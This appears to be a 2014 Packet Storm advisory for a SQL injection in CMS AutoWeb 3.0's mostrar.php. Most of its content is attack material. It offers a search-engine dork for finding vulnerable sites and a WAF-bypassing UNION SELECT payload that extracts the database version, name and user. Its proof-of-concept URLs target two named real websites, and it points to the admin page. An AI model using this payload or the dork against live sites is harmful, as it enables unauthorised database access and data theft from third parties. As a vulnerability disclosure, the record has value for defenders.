CMS AutoWeb 3.0 SQL Injection

2014-09-25T00:00:00
ID PACKETSTORM:128393
Type packetstorm
Reporter Felipe Andrian Peixoto
Modified 2014-09-25T00:00:00

Description

                                        
                                            `[+] Sql Injection on CMS AutoWeb v3.0  
  
[+] Date: 24/09/2014  
  
[+] CWE Number : CWE-89  
  
[+] Risk: High  
  
[+] Author: Felipe Andrian Peixoto  
  
[+] Vendor Homepage: http://www.multdivision.com.br  
  
[+] Contact: felipe_andrian@hotmail.com  
  
[+] Tested on: Windows 7 and Linux  
  
[+] Vulnerable File: mostrar.php  
  
[+} Dork : inurl:"mostrar.php?id_noticia="  
  
[+] Exploit : http://host/mostrar.php?id_noticia=[SQL Injection]  
  
ps:need bypass the WAF protection use sql injection manual.  
  
[+] PoC:   
  
http://www.cbnmogi.com.br/mostrar.php?id_noticia=2671+and+0+/*!12345union*/+/*!12345select*/+1,version%28%29,database%28%29,4,user%28%29,6,7,8,9,10--+ <-- example of how to xploit  
  
http://fmg.edu.br/mostrar.php?id_noticia=77'   
  
[+] Admin Page: http://host/admin/  
  
`